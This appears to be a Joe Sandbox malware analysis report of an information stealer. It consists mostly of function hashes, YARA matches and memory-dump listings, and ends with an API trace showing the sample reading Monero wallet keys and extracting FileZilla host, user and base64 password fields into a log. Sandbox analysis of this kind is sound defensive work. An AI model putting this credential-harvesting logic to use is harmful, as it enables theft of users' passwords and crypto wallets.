                                  • Instruction Fuzzy Hash: FD7206F36082049FE7046E2DEC8567AFBE5EF94720F1A4A3DEAC4C7744E63598018697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: ^&{$*uy
                                  • API String ID: 0-1729172677
                                  • Opcode ID: c7497533c54c6c213fb8874a0beb18aa4f58ed4da48fd996f046343d1fd1204f
                                  • Instruction ID: fca9c67a284c0469f07e5412769c27fb493daf2c858ad7ba363e6b1a643119e9
                                  • Opcode Fuzzy Hash: c7497533c54c6c213fb8874a0beb18aa4f58ed4da48fd996f046343d1fd1204f
                                  • Instruction Fuzzy Hash: 7D72C4F260C2009FE318AF29DC8567AF7E5EF94720F16893DE6C983744EA3598418797
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (1{$wv4
                                  • API String ID: 0-3130603804
                                  • Opcode ID: cf8aef5c9e50742dde64be6569727149ac1a5f8ad601bd56cdf9db74afd88414
                                  • Instruction ID: 9aa8ca337110a0505bcc1733f54ee9e973aa09510b7eed691949884b603309d0
                                  • Opcode Fuzzy Hash: cf8aef5c9e50742dde64be6569727149ac1a5f8ad601bd56cdf9db74afd88414
                                  • Instruction Fuzzy Hash: 7EE1D9F3A09200AFD3046E59EC85BABFBEAEFD4720F16853DE6D483740E6355805C696
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 9-
                                  • API String ID: 0-3406688628
                                  • Opcode ID: 6ac7bed55eb65b66cf7bbb4798d91569f5b54d23781aa4c71b33c8533d6066ac
                                  • Instruction ID: 56a1d9272afbedb955bd3982ed023d766501019aa110988bcd8da7e9f26aa1be
                                  • Opcode Fuzzy Hash: 6ac7bed55eb65b66cf7bbb4798d91569f5b54d23781aa4c71b33c8533d6066ac
                                  • Instruction Fuzzy Hash: 35B204F360C2049FE304AE29EC8567AFBE5EF94320F1A893DEAC4C7744E63558458697
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ps$s_S}
                                  • API String ID: 0-2344491840
                                  • Opcode ID: 6f6e7c0f92c8864259282a680ed94eb0c1cc4a9c584de48d0cb262bcf7b730fa
                                  • Instruction ID: 477992c0110e3c9b2348ab349ca136901e2088d7ca9168d59f000231769eb303
                                  • Opcode Fuzzy Hash: 6f6e7c0f92c8864259282a680ed94eb0c1cc4a9c584de48d0cb262bcf7b730fa
                                  • Instruction Fuzzy Hash: 737114F3A082005FE3049D29DCD5B6BB7DAEFD4320F2A453DDB89D7780E93958058696
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <'~{
                                  • API String ID: 0-3503305900
                                  • Opcode ID: f8900009e52dea328485c92dd90b79ee22fcfab116b498806a6e6d20c32ac799
                                  • Instruction ID: b3f06ff2011cd115ad50391a069dd049b100827d406871e7001687b936114889
                                  • Opcode Fuzzy Hash: f8900009e52dea328485c92dd90b79ee22fcfab116b498806a6e6d20c32ac799
                                  • Instruction Fuzzy Hash: D0A2E4F360C6049FE3046E2DEC8567AFBE9EF94320F16492DEAC4C7744EA3598058697
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: xYI$I?f
                                  • API String ID: 0-3719876894
                                  • Opcode ID: 7a42fb7f8457344cc54553353f2d2abe2ac52647b233b84aef0cf432a32f9b19
                                  • Instruction ID: 48a2bda7a7710f177c836dc0e8df23b9a9b6b7ec1a69865f274152387362fa9e
                                  • Opcode Fuzzy Hash: 7a42fb7f8457344cc54553353f2d2abe2ac52647b233b84aef0cf432a32f9b19
                                  • Instruction Fuzzy Hash: 515158B36082045BE7047A2EEC45B3BF7DAEBD4320F1A453EE68583344F87558068292
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: J>
                                  • API String ID: 0-1419416990
                                  • Opcode ID: ef334663174c6d3c06d977497beaea47a4ce56bc81050f4fbe44e4e0683a3efd
                                  • Instruction ID: ce78305e6a2aaf3fa5e29597e1171a36414d87c710b31793e169acc154306fe9
                                  • Opcode Fuzzy Hash: ef334663174c6d3c06d977497beaea47a4ce56bc81050f4fbe44e4e0683a3efd
                                  • Instruction Fuzzy Hash: 3962E2F3A0C204AFE314AE2DEC8577ABBE5EF94720F16493DEAC483740E63558158697
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: q=*
                                  • API String ID: 0-3368229546
                                  • Opcode ID: 3eef273006ad98eb3a180d7da674a70c82d57a8ff7525df1269f0889f2b8558d
                                  • Instruction ID: 25b6142c4d288a328e96cd93331998c7a67f22eb29ac89a5e0d3ff6593d97fe0
                                  • Opcode Fuzzy Hash: 3eef273006ad98eb3a180d7da674a70c82d57a8ff7525df1269f0889f2b8558d
                                  • Instruction Fuzzy Hash: 3371F4F3A086009FF3089E29DD4573AB6D6EBD4720F1A863DEBC4873C4ED3858058696
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Npn
                                  • API String ID: 0-3325910681
                                  • Opcode ID: dd012e6b0ab60cd16b94ddd6ce9159530d836cbb2812bae6c4ef44ec9f62de31
                                  • Instruction ID: 995e1cf6f6a1e8e544a8d5806ca6192de53cf1d10fe089f15b4a40ffe47ef698
                                  • Opcode Fuzzy Hash: dd012e6b0ab60cd16b94ddd6ce9159530d836cbb2812bae6c4ef44ec9f62de31
                                  • Instruction Fuzzy Hash: 0E6128F3E182085BE300AA6DEC0577AB7D9DBD4320F16893EE7C4D3340F97958058296
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 3d{;
                                  • API String ID: 0-4056195766
                                  • Opcode ID: b97a19958b020a27e2ce288e2a503da7d7afbf7063e61b9bd2eec6f885628473
                                  • Instruction ID: 2d7d297b022e9012e97b3f10ae0ae539e803a66e1638212dbfa08c71720fab5d
                                  • Opcode Fuzzy Hash: b97a19958b020a27e2ce288e2a503da7d7afbf7063e61b9bd2eec6f885628473
                                  • Instruction Fuzzy Hash: 67414DF3B186141BF7089A3EED5573A76C6DBD0320F2A813EEA85D73C8EC7958054285
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 31f4a84dc0c7f9df82774135e76fe18ef18fe4a5b78486e649917d00862d7a1e
                                  • Instruction ID: b189ffbc8ecafe40775e1046181767b4410b44a4cb1cf442044aa307bb863d99
                                  • Opcode Fuzzy Hash: 31f4a84dc0c7f9df82774135e76fe18ef18fe4a5b78486e649917d00862d7a1e
                                  • Instruction Fuzzy Hash: 0412C1F360C6049FE304AF29EC8167AFBE9EF94320F1A893DE5C4C2744E67599458A53
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 55a4a92cefee788cb6835596aa6d026bacaaf3185e1a715859875459c99abdf3
                                  • Instruction ID: 937c91c9b76c7cc9eff6cfa79dca54a8874d62c921adb26c7307d0b487f094c9
                                  • Opcode Fuzzy Hash: 55a4a92cefee788cb6835596aa6d026bacaaf3185e1a715859875459c99abdf3
                                  • Instruction Fuzzy Hash: 1B7117F39085105BE304AE2ADC4577AFBE5EFD4720F2B853DDAC997344DA398C068682
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4d8a5472aa5c03d5bb61eca659d2404a8ec0a876134c206240fbdbbe590042d
                                  • Instruction ID: 8b4474ff225e7e7c59ef96feb9301bacbe963e8f723021b759b6de6181cbc27e
                                  • Opcode Fuzzy Hash: b4d8a5472aa5c03d5bb61eca659d2404a8ec0a876134c206240fbdbbe590042d
                                  • Instruction Fuzzy Hash: E35108F3A087085BE300BE6DDC8476ABBD6EF95320F1B853DDAC8C3744E97959048696
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c8b2933a495ca41eb655f30fea04003ae233552dbf3ab72b98a1f42b7306100
                                  • Instruction ID: 0782c504de9ec108ed4a19c8ddfeba12ab614b1cc645206fa9f6e6a41da7e8ea
                                  • Opcode Fuzzy Hash: 9c8b2933a495ca41eb655f30fea04003ae233552dbf3ab72b98a1f42b7306100
                                  • Instruction Fuzzy Hash: A25123B3E081145BE308653DEC2577B768A9BD0720F2A463EEA86D3BC4ED7898054295
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e38b2f0ff699e5a4dc29c878c44329b1bd3dc95dcb2f20afd2ee8aeb98e00259
                                  • Instruction ID: b58a05a19e033b4411a1a3571989d2705f5a813ca0acea1ab5606e5e2f160ecc
                                  • Opcode Fuzzy Hash: e38b2f0ff699e5a4dc29c878c44329b1bd3dc95dcb2f20afd2ee8aeb98e00259
                                  • Instruction Fuzzy Hash: A651F8B260C21CEFD3006A98DC81B7ABBF8E754360F31493AF7C6D7200E2615851A7D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 79bb3946828496045339d317bface7fdc18d18e0cb6d1d90b1624f78f4eb5c84
                                  • Instruction ID: e49f4f09315eb014b258b773db571bcd638a3177de6a05f729b0c103b430d3ad
                                  • Opcode Fuzzy Hash: 79bb3946828496045339d317bface7fdc18d18e0cb6d1d90b1624f78f4eb5c84
                                  • Instruction Fuzzy Hash: C75127F3B091006FE3045929DC45767BBDBEBE4320F2A853DE6C4D7798E97898028282
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a750a43a9d16dd898841b8573ea0129881e1277b3a7e48d06693ad0b9c56ad1f
                                  • Instruction ID: 4b271d7512adaaf27cc274eed7af499d9f9ef7194ab937620304354cfa08ab83
                                  • Opcode Fuzzy Hash: a750a43a9d16dd898841b8573ea0129881e1277b3a7e48d06693ad0b9c56ad1f
                                  • Instruction Fuzzy Hash: DA41AAF7B1860C9BE308692DEC8467BB78ADBD4320F2A833DE681C7708EC759C054191
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4d8a7689b95a829120af565880130cb6311bbb84eb1e8b88b5ff474173398cfe
                                  • Instruction ID: 5be07caf373bf3f827b4faca7601d737d0b8c60be45c3713292e1296f90350e4
                                  • Opcode Fuzzy Hash: 4d8a7689b95a829120af565880130cb6311bbb84eb1e8b88b5ff474173398cfe
                                  • Instruction Fuzzy Hash: 5941B4F39086149FE714AE19DC8176AF7E5EF84720F16492DEAC887340EA7598008BD7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 00728DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00728E0B
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 007199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007199EC
                                    • Part of subcall function 007199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00719A11
                                    • Part of subcall function 007199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00719A31
                                    • Part of subcall function 007199C0: ReadFile.KERNEL32(000000FF,?,00000000,0071148F,00000000), ref: 00719A5A
                                    • Part of subcall function 007199C0: LocalFree.KERNEL32(0071148F), ref: 00719A90
                                    • Part of subcall function 007199C0: CloseHandle.KERNEL32(000000FF), ref: 00719A9A
                                    • Part of subcall function 00728E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00728E52
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00730DBA,00730DB7,00730DB6,00730DB3), ref: 00720362
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00720369
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00720385
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 00720393
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 007203CF
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 007203DD
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00720419
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 00720427
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00720463
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 00720475
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 00720502
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 0072051A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 00720532
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 0072054A
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00720562
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00720571
                                  • lstrcat.KERNEL32(?,url: ), ref: 00720580
                                  • lstrcat.KERNEL32(?,00000000), ref: 00720593
                                  • lstrcat.KERNEL32(?,00731678), ref: 007205A2
                                  • lstrcat.KERNEL32(?,00000000), ref: 007205B5
                                  • lstrcat.KERNEL32(?,0073167C), ref: 007205C4
                                  • lstrcat.KERNEL32(?,login: ), ref: 007205D3
                                  • lstrcat.KERNEL32(?,00000000), ref: 007205E6
                                  • lstrcat.KERNEL32(?,00731688), ref: 007205F5
                                  • lstrcat.KERNEL32(?,password: ), ref: 00720604
                                  • lstrcat.KERNEL32(?,00000000), ref: 00720617
                                  • lstrcat.KERNEL32(?,00731698), ref: 00720626
                                  • lstrcat.KERNEL32(?,0073169C), ref: 00720635
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 0072068E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
